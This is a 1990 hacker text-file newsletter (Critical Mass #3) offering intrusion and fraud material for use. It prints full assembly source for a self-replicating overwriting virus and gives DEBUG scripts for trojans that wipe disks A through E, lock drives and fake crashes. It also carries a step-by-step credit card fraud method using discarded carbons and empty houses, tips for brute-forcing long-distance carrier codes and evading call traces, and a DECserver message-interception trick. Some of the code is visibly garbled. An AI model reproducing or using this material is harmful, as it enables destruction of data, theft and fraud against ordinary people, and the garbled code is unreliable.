_____________________________________________________________________________ \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/ \ Critical Issue # 03 A Technical Text / \ Mass ~~~~~~~~~~~ File Newsletter. / \________________________________|____________________________________/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ __________________________ __________ l___________ | ___________l // \ _______ _____ l|l _____ ______ ___ // /~~~~~~~\_\ l \ l l l|l l l // \ _ l l // / l [] / ~l l~ l|l ~l l~ // /~~~\_\ / \ l l <<<< ritical l / l l l|l l l // / / \ l l \\ \ l < l l l|l l l <<<< / ___ \ l l \\ \_______/~/ l l\ \ l l l|l l l \\ \____/~/ / / \ \ l l_____ \__________/ l__l \_\ l___l l_l l___l \_______/ /_/ \_\ l_______l ==--> ==--> ____ __ ____ ==--> (12/29/90) l \ / l ass ==--> l \ / l __ ______ ______ l \ / l / \ / \ / \ A Technical l l\ \ / /l l / \ / /~~~~~~ / /~~~~~~ text file newsletter l l\\ / l l / ____ \ \ ~~~~~~/ \ ~~~~~~/ ~~~~~~~~~~~~~~~~~~~~ l l \\____/ l l / / \ \ ~~~~/ / ~~~~/ / Issue: 3 l l l l /_/ \_\ /~~~~ / /~~~~ / ~~~~ ~~~~ ~~~~~~ ~~~~~~ _____________________________________________________________________________ l Writters l Special thanks to.... l l__________________________l________________________________________________l l l l l The Beaver l Abigal, Shadow, The Nut-Kracker, Pink Floyd l l Zap l Zap, Robo, and many others! l l__________________________l________________________________________________l * Note: We, the writters and editors, of this text newsletter are not respossible for any injuries or prosocutions due to the information giving in this text. EXPERIMENT AT YOUR OWN RISK! Anybody who is willing, can submit an article! If you wish to submit an article, please e-mail either 'The Beaver' or the 'Nut- Kracker', via the 'Warriers Retreat' (904)422-3606. Also, All sysops can freely download this text in the terms that it is not altered and none of the credits are change. So................. please act like a human! Also, for your convience, every now and then a 'volume' of the Critical Mass is created. That is, after three to five issues (roughly 50k to 70k of text) a compiled text will be made containing the past issues, so if you have missed any issues,you can download the volume you need. In order for this text to keep on being produced, you the reader needs to submit, either it be by asking questions (Which will sometime be included in the text) or by submitting and article. Any articles on Hacking, Fone Phreaking, Credit Card Surfing, Pirating, Chemistry, etc. our welcome. Any general 'not accepted' material is accepted here! Artcles can be on anything from 'how to rip off this type of coke machine' to 'how to build a Axis bomb from spare car parts'. We hope you enjoy the information given and find some use for it. /\ /\/\ Chief Editor Brought To You By /\/\/\ ~~~~~~~~~~~~~ Members of /\/\/\/\ The Beaver (SC/HA) /\/\/\/\/\ /\/\/\/\/\/\ /\/Critical\/\ \/\/\Mass/\/\/ (SC/HA) \/\/\/\/\/\/ \/\/\/\/\/ \/\/\/\/ \/\/\/ \/\/ \/ ______________________________________________________________________________ l This issue contains articles of the following..... l l____________________________________________________________________________l l l l I. Editorial written by 'The Beaver'. l l II. Part III of Hacking DECservers (Last One!) by 'The Beaver' l l III IBM Destruction! Part III by 'The Beaver' l l IV. Credit Card Fraud part I Written By The Beaver l l V. Quick COM Trojan Referance, by 'Zap' l l____________________________________________________________________________l ______________________________________________________________________________ l Todays Topic Is....... l l Written By The Beaver l l____________________________________________________________________________l Oh, the things to talk about and the things to hack. There are so many, yet so little time. The things this text could bring up. The potental. I love it. Here's something intresting, I here that a few hackers in the Atlanta area just got the 'IBM Home Destruction Kit v1.4', and there enjoying it very much. This is good, and be watching out for version 2.0. As you read this, the 'SC/HA Hacker ToolBox v3.0', should be out. Get it today. Lately, my big thing has been LD carriers. What great little toys the fone company offers hackers. Tonight, I was just reading the this Anarchist newletter (I got it off of The Reactor BBS (904)878-1736), or ATI_#50, in which they where talking about LD carriers. After reading the artical, which did have very good info, they went into talking about using other peoples accounts on these and how you could get caught. I like the articles they write, but yet I beg to differ. Considering most carriers are wats lines, that blows that theroy to hell if you ask me. Still if you get the chance, do get it. Also get ANY newsletters from......... TAPP 2600 These are top of the line hack stuff here. To get more info on them, download ATI_#50. Any rate, I've been hack'in on these lately, cause I've been feeling a little unsure about a system and about hacking it direct, so instead of finding a in/out modem that will support it, I'm using LD carriers. If you ask me they are easy to hack and VERY useful. They tell you the majority of the time when you enter a wrong account, and sence your using a touch tone fone, you only have 0-9 to worry about, plus the uses of the # and * key. For more info just download ATI_#50. Anyrate, here are a few LD carriers........ (800)547-1784 6 digit code (800)882-2255 ? ????? ???? (800)437-7010 8 digit code (800)325-1337 6 digit code (800)327-9488 6 digit code Hell, you can get carriers out of the fone book. You don't even need a computer to hack'em! It can help though. This is the best way to hack them by computer that I know of. Set you system up to try codes then a fone number you know that has a carrier. If the code is invalid, your NOT going to get a carrier right? If it is, you got a account! The SC/HA ToolBox Hacker will do this for you, so give it a shot! Also, I've been hacking on a 'Centel Packet', any information that you know about these network systems, please e-mail me at 'Warriers Retreat'. (904)422-3606 or 'The Reactor BBS'(904)878-1736. As I sit here at my terminal, I'm listing to U.S forces fight a 'war' as of this date. In case your wondering I'm refering to the Kuwait 'leberation'. Now I know what your thinking, what does this have to do with hacking. While listing to the radio, I decided to do a wargame in the 224 area prefix, when my wargame dialer was interrupted by the fone ringing. I picked up to have a lady ask if I had just called her house. I said 'Ya, I sure did, you see I was using my computer to call a friend and I dialed the wrong number , sorry'. She stated that 'Oh, its alright, but its rude to hang up on people like that, tell them you got the worng number.'. I said 'sorry, bye'. As you may know, the Centel offers call tracing. Its neat for them, but not for us hackers. When wargaming, you can usually get away wih what I just did with some old lady. This gave me a few tips that I thought I would pass on to less experiance hackers. 1. Dial about 100 to 200 Max. Never more. The fone company starts to think after a while, but you have nothing to worry about as long as you stay in that range. 40 to 60 numbers max on WATS lines. The fone company will really start to think if you dial 1000 WATS lines. Think about it. 2. Keep you wargaming to a minimum. Im bad about this rule. 3. When caught by someone like above, don't worry, just play it off. If you do your wargaming at night, you stand less of a chance that call tracing will be used. People are tired. Also it cost four bucks per trace. 4. Once you have a list of good systems you would like to hack, keep it at that. Also, find other people that wargame and exchange numbers. This cuts back on wargaming and keeps you both in good shape. Remember these rules! Computer hackers are a dying breed in our area, so if you truely hack, be proud but careful. ---====--- P.S. - Heres a funny note. A friend of mine left his wardialer running with no end to dialing and dialed over 2000 numbers. His line was cut and he had to call the operator and get it turned back on. Its not really against the law to wargame, but in a way it is considered harrassment , so in a way it is. I won't mention how it was, but it was funny. P.S.S- In this issue, there WAS going to be a artical on cracking commie software by the Shadow, but SOMEBODY got to involved in another project and hasn't finnished it yet. Look for it in CM#4 ________________________________________ l l l Hacking DECservers l l Part III l l Last Part! l l l l The Beaver l l______________________________________l Ok guys, here it is, the finnal part to hacking DEC servers! This is the last of the info about them, except maybe for a little tidbits of info here and there. First off, It would be wise to read parts I, II, and III. Those are in issues CM#1, CM#2, and of course this one. Lets kill the small talk and get on with it! Ok, we all know how to broadcast messages from port to port right? Well I hope so, anyway, I bet that you thought that broadcast was a pretty secure method of sending messages, that is that another port won't recieve messages that you send to a different port. Well, don't think this, they CAN be recieved so be careful. Heres how YOU can intercept messages on a privleged account. First, set up a service. Fake that is. So type the following........ set service (service name) This will create a service, but in its current state, you can't connect to it. So we must enable the service for all or certain ports, like thus..... set service (service name) port (port number) Now you can connect to it. You may want to make a identifier like thus...... set service (service name) ident "(identifier here)" This makes it look nice and neat. Now if you connect to this service you will note that nothing happens, BUT if someone sends a message, you will recieve it, because as far as we can figure, your looking into message buffer. You will get none of the 'From port' such and such, but just the message. No matter where it comes from. Pretty neat huh? As for the decoy Idea, we have yet to find a reliable way to set one up. When we figure out how the maintenance password system works we can probably use a compiler or interpreter to create one. Till then....... Well, it looks like part III is a little short so sorry, but all the info you got in the past parts should be more than enough to keep you very busy. Before we end, I would like to thank a few DECserver hackers who helped with hacking and ideas about this type of system......... Namely............ Shadow, The Nut-Kracker, Abigal, Gator off of UFnet, Mentalist, and many others. Chow.............. ---====--- ___________________________________ l l l IBM Destruction l l Part III l l l l The Beaver l l_________________________________l Well, here's part III!!!!!! So far we have talked about the following....... Trojans..... ------------- Destroying disks on all drives, including drive C: Creating Fales Keyboard Errors Creating Faler Disk Errors Simulating System Crashes Creating Trojans in TXT files by remapping key thur the ANSI driver Etc, Etc Viruses..... ------------- Creating a EXE to COM infector logical virus in basic. Creating a EXE to EXE infector logical virus in basic. Creating a Batch file virus Etc, Etc Now the trojan section goes pretty deep, but the virus section is still shallow. So this is a 500 byte code of a overwritting TRUE virus. It comes with remarks, but they can be taken out. Thats all there will be for part III, cause the code is VERY long........ page 70,120 Name Virus ;*************************************************************************** ; Program Virus Ver: 1.1 ; Copyright by R. Burger 1986 ; This is a demostration program for computer ; viruses. It has the ability to replicate itself, ; and thereby modify other programs ;*************************************************************************** Code Segment Assume CS:Code progr equ 100h ORG progr ;*************************************************************************** ; The three NOP's serve as a marker byte of the ; virus which allow it ot identify a virus ;*************************************************************************** MAIN: nop nop nop ;*************************************************************************** ; Initialize the pointers ;*************************************************************************** mov ax,00 mov es:[pointer],ax mov es:[counter],ax mov es:[disk],al ;*************************************************************************** ; Get the selected drive ;*************************************************************************** mov ah, 19h ;drive? int 21h ;*************************************************************************** ; Get selected path on the current drive ;*************************************************************************** mov cs:drive,al ; save drive mov ah,47h ; dir? mov dh,0 add al,1 mov dl,al ; in actual drive lea si,cs:old_path int 21h ;*************************************************************************** ; Getting the number of drive present ; If only one drive is present, the pointer for ; search order will be set to search order +6 ;*************************************************************************** mov ah, 0eh ; how many drives mov dl,0 ; int 21h mov al,01 cmp al,01 ;one drive? jnz hups3 mov al,06 hups3: mov ah,0 lea bx,search_order add bx, ax add bx, 0001h mov cs:pointer,bx clc ;*************************************************************************** ; Carry is set, if no more .COM's are found. ; Then, to avoid unnessar work, .EXE files will ; be renamed to .COM files and infected. ; This causes the error message "Program too large ; to fit in memory" when starting larger infected ; EXE files ;*************************************************************************** change_disk: jnc no_name_change mov ah,17h lea dx,cs:maske_exe int 21h cmp al, offh jnz no_name_change ; .EXE found? ;*************************************************************************** ; If neither .COM nor .EXE is found, then sectors will ; be overwritten depending on the system time in ; millisecounds. This is the time of the complete ; "infection" of a storage medium. The virus can find ; nothing more to infect and starts its destruction. ;*************************************************************************** mov ah, 2ch ; read system clock int 21h mov bx,cs:pointer mov al,cs:[bx] mov bx,dx mov cx,2 mov dh,0 int 26h ; write crap on disk ;*************************************************************************** ; Check if the end of the search order table has been ; reached. If so, end ;*************************************************************************** no_name_change mov bx,cs:pointer dec bx mov cs:pointer,bx mov dl,cs:[bx] cmp dl,0ffh jnz hups2 jmp hops ;*************************************************************************** ; Get new drive from the search order table and ; select it. ;*************************************************************************** hups: mov ah,0eh int 21h ; change disk ;*************************************************************************** ; Start in the root directory ;*************************************************************************** mov ah,3bh ; change path lea dx,path int 21h jmp find_first_file ;************************************************************************** ; Starting from the root, search for the first subdir ; first convert all .EXE files to .COM in old ; directory. ;************************************************************************** find_first_subdir: mov ah,17h ; change exe to com lea dx,cs:maske_exe int 21h mov ah,3bh ; use root dir lea dx,path int 21h mov ah,04eh ; Search for first subdirectory mov cx,000100001b ; dir mask lea dx,maske_dir ; int 21h ; jc change_disk moc bx,CS:pointer INC BX DEC bx jz use_next_subdir ;************************************************************************** ; Select found directory ;************************************************************************** use_next_subdir: mov ah,2fh ; get dta address int 21h add bx, 1ch mov es:[bx],'\ ' ; address of name in dta inc bx push ds mov ax,es mov ds,ax mov dx,bx mov ah,3bh ; change path int 21h pop ds mov bx,cs:counter inc bx mov CS:counter,bx ;************************************************************************** ; Find first .COM file in the current directory. ; If there are none, search the next directory ;************************************************************************** find_first_file: mov ah,04ef ; Search for first mov cx,00000001b ; mask lea dx,maske_com ; int 21h jc find_first_subdir jmp check_if_ill ;************************************************************************* ; If the program is already infected, search for ; the next program. ;************************************************************************* find_next_file mov ah,4fh ; search for next int 21h jc find_first_subdir ;************************************************************************* ; Check if already infected by the virus. ;************************************************************************* check_if_ill; mov ah,3dh ; open channel mov al,02h ; read/write mov dx,9eh ; address of name in dta int 21h mov bx,ax ; save channel mov ah,3fh ; write in buffer mov cx,buflen ; mov dx,buffer ; write in buffer int 21h mov ah,3eh ; close file int 21h ;************************************************************************* ; Here we search for three NOP's. ; If present, there is already an infection. We must ; then continue the search. ;************************************************************************* mov bx,cs:[buffer] cmp bx,9090h jz find_next_file ;************************************************************************* ; Bypass MS-DOS write protection if present ;************************************************************************* mov ah,43h ; write enabled mov al,0 mov dx,9eh ; address of name in dta int 21h mov ah,43h mov al,01h and cx,11111110b int 21h ;************************************************************************* ; Open for read/write access ;************************************************************************* mov ah,3dh ; open channel mov al,02h ; read/write mov dx,9eh ; address of the name in dta int 21h ;************************************************************************ ; Read date entry of program and save for future use. ;************************************************************************ mov bx,ax ; channel mov ah,57h ; get date mov al,0 int 21h ;************************************************************************ ; The jump located at address 0100h of the program ; will be saved for future use. ;************************************************************************ mov dx,cs:[conta] ; save old jmp mov cs:[jmpbuf],dx mov dx,cs:[buffer+1] ; save new jmp lea cx,cont-100h sub dx,cx mov cs:[conta],dx ;************************************************************************* ; The virus copies itself to the start of the file. ;************************************************************************* mov ah,40h ; write virus mov cx,buflen ; length of buffer mov dx,main ; write virus int 21h ;************************************************************************* ; Enter old creaion date of file. ;************************************************************************* mov ah,57h ; write date mov al,1 pop dx pop cx ; restore date int 21h ;************************************************************************ ; Close the file. ;************************************************************************ mov ah,3eh ; close file int 21h ;************************************************************************ ; Restore the old jump address. ; The virus saves at address "conta" the jump which ; was at the start of the host program. ; This is done to preserve the execubility of the ; host program as much as possible. ; After saving it still works with the jump address ; contained in the virus. The jump address in the ; virus differs from the jump address in memory ; ;************************************************************************ mov dx,cs:[jmpbuf] ; restore old jmp mov cs:[conta],dx hops: nop call_use_old ;************************************************************************ ; Continue with the host program ;************************************************************************ cont db 0e9h conta dw 0 mov ah,00 int 21h ;************************************************************************ ; Reactivate the selected drive at the start of the ; program. ;************************************************************************ use_old: mov ah,0eh ; use old drive mov dl,cs:drive int 21h ;************************************************************************ ; Reactivate the selected path at start of the ; program. ;************************************************************************ mov ah,3bh ; use old dir lea dx,old_path-1;get old path and backslash int 21h ret search_order db 0ffh,1,0,2,3,0ffh,00,0ffh pointer dw 0000 ; pointer f. search order counter dw 0000 ; counter f. nth. search disks db 0 ; number of disks maske_com db "*.com",00 ; search for com files maske_dir db "*",00 ; search for dir's mask_exe db 0ffh,0,0,0,0,0,00111111b db 0,"???????exe",0,0,0,0 db 0,"???????com",0 db 0ffh,0,0,0,0,0,00111111b db 0,"????????????",0,0,0,0 db 0,"?????????com",0 buffer equ 0e000h ; a safe place buflen equ 230h ; length of virus !!!!!!! ; careful ; if changing !!!!!!! jmpbuf equ buffer+buflen ; a safe place for jmp path db "\",0 ; first path drive db 0 ; actual drive back_slash db "\" old_path db 32 dup(?) ; old path code ends end main This virus must be running one DOS 2.11 or higher. the virus can be made shorted by removing all remarks, extra segment calls.humps, etc. It was written by the world known virus expert R.Burger, in 1986. Have fun! ---====--- _____________________________________ l l l Credit Card Fraud l l Part I l l The Beaver l l___________________________________l I'm not very into this type of stuff, or at least for the last few years, but it is amazing how easy credit card fraud is. For about 3 to 4 years, I did do the following that I am about to mention and was never caught. I must warn you the read that never the less this is a very risky game. Actually, it is far from a game, but is actually very easy to get away with. If you must use the information given, please make it something worth while. Don't use credit card fraud for a neat game you saw in 'Compute' magazine, but rather something you need. I must also note that when you do this, 90% of the time, the guy or girl you ripped off never has to pay for the goods you got but rather the card company that you used. Here we go............ To preform credit card fraud you need no computer, just a few magazines and a card number. Here is the way we use to run things when I did it step by step. All you need is a credit card number, experation date, and the name of the credit card holder. In case your wondering where this information can be found, its all around you every day. If you have a very photographic memory, you can obtain all you need at a store, but like most, you probably can't memorize 16 to 13 digits, the card holders name, and the experation date. In this case, you can usually goto a store that is closed and dig though the trash late at night. In the trash you should find 'carbons', or the transfering screen. These are black and when pressed upon tranfer all charaters to another piece of paper. For example, if you take a carbon and put it over a piece of paper and write your name on the carbon, it will also be written on the piece of paper as well as the carbon. In this case it goes paper-carbon -paper, so that a copy goes to the customer and a compy to the store and the carbon is thrown away. When you dig through the trash, you find the carbons and when held backwards in the light, you can see all the information you need to preform credit card fraud. On the carbon, as said before, you will see a 16 to 13 digit number. This is there credit card number. If it is not 13 to 16 digits, something is wrong, so don't use it. Here are the two most popular formats. 4XXX-XXXX-XXXX-XXXX 5XXX-XXXX-XXXX-XXXX Theses are you basic 16 digit formats. The 'X's signify other numbers. Whats so important about the '4' and '5' are that they tell what type of card they are. For instance, a credit card that start with '4' is a VISA card, and a credit card that starts with '5' is a MASTERCARD. All cards run by this format. For example, I think cards that start with '3' are DISCOVER cards, but at this point, because its been so long, I can't remember. But that is what tells each card apart. Remember this, this is important information. Just remember, you must AT LEAST have the card holders name, experation date and card number. Sometimes you need this and there address and phone number, but sometimes you can get by without them. Try to get all the information you can get on them, the more you have the more it helps. The next step we took was simply looking in magazines and finding things we wanted and needed. We would write down the price and the phone numbers. We DID NOT CALL THEM THEN, but later. Just keep reading you'll see why. After this, we found a empty house that was for sale and we knew would be open for at least a week. We would look in the 'home buyers guide' and check out houses. When we found one, we would copy the address and the next phase would take place. This phase consisted of calling the places that we wanted to order stuff from and ordering UPS. Early on in our credit card scams, we tried sending it US mail, but you will never get it. The reason it works with UPS is because they leave it on the door step if it is pre-paid for, which in this case it is. NOTE: When the orders where placed, we would send the stuff too the house for sale (we nobdy lived), this is where the trick and the risk comes in. In about a week, the stuff we ordered would show up at the door step of the house we order it from. We would check at the house three days after we had order them ever day. The risk is when you pick up the goods. Actually, at the worst, the card holder can only find out a week after it happened, because the billing lags behind the order, so actually the risk is slim, but there is still a risk. We would simply go there at night, scope out the area and grab the stuff. As I said, the risk is not very much, but in my opinion, there is still a risk involved, bu thtat is only in the pick up. TIPS: When you order the goods, all you should be asked is what you want, the card type (note the top and see way thats important!), experation date, you name (the card holders name OF COURSE!), and the address (the empty house). When the mail order house asks your social security numbers and other stange questions, something fucked up. You don't have the correct information. Just simply hang up, also ONLY DO YOU ORDERING ON WATS LINE. They can't (or at least have to have tons of time to trace , about 5 to 8 hours to be exact) trace, where if you order in you area it takes about millisecound. What you just read is the bare basics of credit card fraud. Its that easy! Thats why I don't have or want a credit card, even though they are becoming a standard. Part II will cover the use of merchant numbers and some other advanced methods of credit card fraud. Chow! ---====--- The Trojan and Virus Quick Reference Guide Information by: The Beaver Written By: Zap From Critical Mass Issue #1 -------------------------------------------------------------------------------- Trap Disk Access a100 mov ah, 35 mov al, 4 int 21 mov ax, es mov dx, bx mov ds, ax mov ah, 25 mov al, 13 int 21 mov ax, 0 int 21 <--- This Space must be here! r cx 15 n (Enter a name you want the compiled file to be).COM w q -------------------------------------------------------------------------------- Fake System Crash a100 mov ah, 35 mov al, 4 int 21 mov ax, es mov dx, bx mov ds, ax mov ah, 25 mov al, 9 int 21 mov ax, 0 int 21 <--- This Space must be here! r cx 16 n (The name you want the compiled file to be).COM w q ------------------------------------------------------------------------------- Trap the Key Board a100 mov ah, 35 mov al, 4 int 21 mov ax, es mov dx, bx mov ds, ax mov ah, 25 mov al, 13 int 21 mov ax, 0 int 21 <--- This Space must be here! r cx 15 n (The name you want the compiled file to be).COM w q -------------------------------------------------------------------------------- Destroy Disk A: a100 mov ah, 5 mov dl,0 0 mov dh, 0 mov ch, 0 mov cl, 1 mov al, 8 int 13 mov ah, 0 int 21 <--- This Space must be here! r cx 16 n (The name you want the compiled file to be).COM w q -------------------------------------------------------------------------------- Destroy Disk B: a100 mov ah, 5 mov dl,0 1 mov dh, 0 mov ch, 0 mov cl, 1 mov al, 8 int 13 mov ah, 0 int 21 <--- This Space must be here! r cx 16 n (The name you want the compiled file to be).COM w q Destroy Disk C: a100 mov ah, 5 mov dl,0 2 mov dh, 0 mov ch, 0 mov cl, 1 mov al, 8 int 13 mov ah, 0 int 21 <--- This Space must be here! r cx 16 n (The name you want the compiled file to be).COM w q -------------------------------------------------------------------------------- Destroy Disk D: a100 mov ah, 5 mov dl,0 3 mov dh, 0 mov ch, 0 mov cl, 1 mov al, 8 int 13 mov ah, 0 int 21 <--- This Space must be here! r cx 16 n (The name you want the compiled file to be).COM w q -------------------------------------------------------------------------------- Destroy Disk E: a100 mov ah, 5 mov dl,0 4 mov dh, 0 mov ch, 0 mov cl, 1 mov al, 8 int 13 mov ah, 0 int 21 <--- This Space must be here! r cx 16 n (The name you want the compiled file to be).COM w q Lock up Drive A: a100 mov ah, 35 mov dl, 0 mov dh, 0 mov ch, 80 mov cl, 1 mov ah, 8 int 13 mov ah, 0 int 21 <--- This Space must be here! r cx 16 n (The name you want the compiled file to be).COM w q -------------------------------------------------------------------------------- Lock up Drive B: a100 mov ah, 35 mov dl, 1 mov dh, 0 mov ch, 80 mov cl, 1 mov ah, 8 int 13 mov ah, 0 int 21 <--- This Space must be here! r cx 16 n (The name you want the compiled file to be).COM w q -------------------------------------------------------------------------------- Triple Program Load Time a100 mov ax, 0 mov ds, ax mov bx, 522 mov ah, ff mov (bx), ah xor ax,ax int 13 mov,00 int 21 <--- This Space must be here! r cx 16 n (The name you want the compiled file to be).COM w q NOTE: MAKE THESE INTO ASCII FILES AND THEN FROM A DOS PROMPT TYPE THE FOLLOWING... DEBUG < (The name of the file) I.E. if this was an ASCII file called DISKACC.TXT I would type the following: DEBUG ==--- _____________________________ l l l Letters And Replies l l___________________________l As before, here are some letters recieved and here are some replies. If you have a question, E-mail me at 'The Reactor BBS' (904)878-1736 or 'Warriers Retreat BBS' (904)422-3606. Also, all letters are annonymous unless you state other wise! From: XXXXXXXXXXX Read: 25 times [1 Reply] Subject: Beaver Hello Monsieur Beaver, I have some suggestions for CM. Give more details when describing how to do stuff. Some of your info was excellent, but at times it was not enough. Is there a number where I can reach you voice? Ok, your right, sometimes the information does go a little far and not that well explained, but when Im writting, I tend to think that the reader is a hacker and already knows alot of the stuff, so I get carried away, assuming that everybody understands the things I leave out. If you have any questions, drop me a line. Im sorry but I don't give out my fone number to strangers. Sorry! Chow!........ ---====--- By:XXXXXXXXXXXXXXX Beaver, What new features will the 'IBM Destruction Kit v2.0' have that version 1.4 doesn't have? After writting version 1.4, I relized the versitity as a 'kit' was very little, sence it only created just the file you asked for. So all you could create was a 'drive C destroyer' and not a 'keyboard traping, drive A, B, and C destroyer' in one shot. With version 2.0, you can do this. Also, the files where in assembly and adveraged about 20 bytes. Thats pretty short to be a 'neat game', or what not, so I added in the options of putting in nop's to waste space to make the file appear longer. Actually, the first part of the program are all that counts though. I also added a few other features I think you guys will like. You can get it from 'The Reactor BBS' under the name 'grind2.zip' when it comes out! From: XXXXXXXXXXX Hello once again, I understand about the phone number (not giving it out). The only problem is, I don't feel comfortable asking you questions about FIRN on this or any other BBS. I don't want people complaining about me on this board. I would like to keep a good status with the users and the sysop so I can keep up the message reading and file getting. Know what I mean? I have been trying to get a priv account on so many things on FIRN, but I can't get one. I have been trying every night for the past week (since I read your article). I have no problem getting on to FIRN and connecting to FAU Ethernet and then connecting to a service. The only problems I have arise when username and password prompts arise. I am an 18 year old FSU computer science major. I wish we had different ways to communicate (non-BBS) I can be contacted most every night on 'call 202' off of UFnet. If you can 'hold you horses' I can almost always be reached there, anlong with a few other hacker friends of mine. Just do the following. Call FIRN (488-0650) Press 'A' Type 'UFNET' At the '#' prompt type 'call 202' Then type 'sho u' (shows users currently online) If im on you will see the name 'beaver' and to the left of that the port number To send me a message type: bro por (#) "Msg. here" E.G bro por 7 "hello beaver how are you" Also, I have found when using terminals like 'pc-talk' I can't use 200 either. the only thing I can suggest is to use a ANSI comp. terminal or a vt52 or vt100 terminal. ---====--- _________________________________ l l l Finnal Notes l l_______________________________l Well, once again we come to the end of another issue of Critical Mass. Here is what you can probably (I stress probably) expect in the next issue. Hacking UNIX/SUN's and VAX's Kracking Commie Software The IBM Home Destruction part V And MUCH more, but you'll just have to wait and see. Also, a software update. The 'IBM Home Destruction Kit' is being merged with the 'The SC/HA Hacker Toolbox'. So there will be no version 2.0 of the 'IBM Home Destruction Kit'. Heres what 'The SC/HA Hacker ToolBox V3.1' will have........ Online and Offline Trojan Kit with.... Drive A,B,C,D kills Simulated Errors ANSI Remapping Simulated Crashes Multiple task trojan creator Much MORE! File Tranfer's in..... XModem Ymodem ASC Buffering LD Carrier code finer Dbase hacker with..... 470+ popular passwords A 'Fall in' term for those nets And about a ton more! Like Terminal Emulations, and other things! ALSO: I had tons of question about hacking DECservers so I and a few other people are going to put together a text file explaining every detail on the basics of DECservers along with hacking them. I have no idea when it will be out though........ Shadow has been working on a simular kit for the Amiga and I here that another friend of mine is thinking about writting a simular term for the c64. We'll see. Any rate, happy hack'en and stay away from those modem police! Thanx To: Pink Floyd (for that UNIX info), Shadow, Abigail, Robo for forwarding mail, My dad again for ideas, and many others No Thanx Too: The usual assholes, you know how you are! ---====--- I